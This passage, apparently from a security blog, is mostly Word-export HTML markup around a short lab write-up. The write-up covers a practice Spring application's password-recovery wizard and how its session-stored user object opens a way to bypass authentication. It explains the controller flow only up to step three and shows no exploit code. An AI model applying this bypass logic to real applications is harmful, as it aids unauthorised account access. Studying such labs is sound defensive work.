<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</span></div>
<br />
<br />
<h3 style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Justice
League</span></div>
</span></h3>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">
</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Another
task. Actually, solution for this task doesn't involve using an autobinding
vuln, but there is one.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The application
consists of registration, authentication, home, and password recovering
"pages". The latter is only one that is important for us.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Actually,
recovering page is just one controller with several methods and it represents a
way of creating "wizards" (multi-step forms). </span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Our goal
for this task is to bypass authentication.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Overall
logic is the following.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">1) A user
comes to a recovery page, inputs its username and send a request to submit the
form</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">2) the
resetHandler method receives the HTTP request. It gets a user object from the
db using the username from the request. Then it puts the user object in the
Model, and it automatically puts the object into a session
(@SessionAttribute("user") for the controller). Then it redirects to
next part of "wizard".</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Pk21rrY6okI9ztzx2O8smYhCNkSXj1-9oh21ZBLCktjxztPjnr7tgr-aDlYRIfNzOYTjziHmnq33WZZZo43FEI1MHambKriCxZKK86Yz0nydjv4MOrIu0eVngs2ox4jdxF3pGYToCRXY/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Pk21rrY6okI9ztzx2O8smYhCNkSXj1-9oh21ZBLCktjxztPjnr7tgr-aDlYRIfNzOYTjziHmnq33WZZZo43FEI1MHambKriCxZKK86Yz0nydjv4MOrIu0eVngs2ox4jdxF3pGYToCRXY/s640/4.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">3) The user
is redirected to the resetViewQuestionHandler method. Actually, the method
takes the user object from the session (yeah-yeah, using @ModelAttribute). It requires
that object because the method has to get a custom user security question and
show it in a view (however, that hasn't been implemented :)</span></div>
<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<span lang="EN-US" style="mso-ansi-language: EN-US;"></span><span lang="EN-US" style="mso-ansi-language: EN-US;"></span><span lang="EN-US" style="mso-ansi-language: EN-US;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3l74gOd7a1bk8iy-_rLQOEoZ6wsyFbAqwVLQXFR6Mz9xbAOTd4fJIkuaOAuHpow9TpdKBj1icL6AXajDEX0l9u9anM6yFIsm6-DcsGGXJrhoyGR-pdY1o0HQ-L2Zh7IB660JIR69lD0cq/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3l74gOd7a1bk8iy-_rLQOEoZ6wsyFbAqwVLQXFR6Mz9xbAOTd4fJIkuaOAuHpow9TpdKBj1icL6AXajDEX0l9u9anM6yFIsm6-DcsGGXJrhoyGR-pdY1o0HQ-L2Zh7IB660JIR69lD0cq/s640/5.png" width="640" /></a><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<span lang="EN-US" style="mso-ansi-language: EN-US;">
</span>
<br />
<div class="MsoNormal">
</div>
<br />
<div class="MsoNormal">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
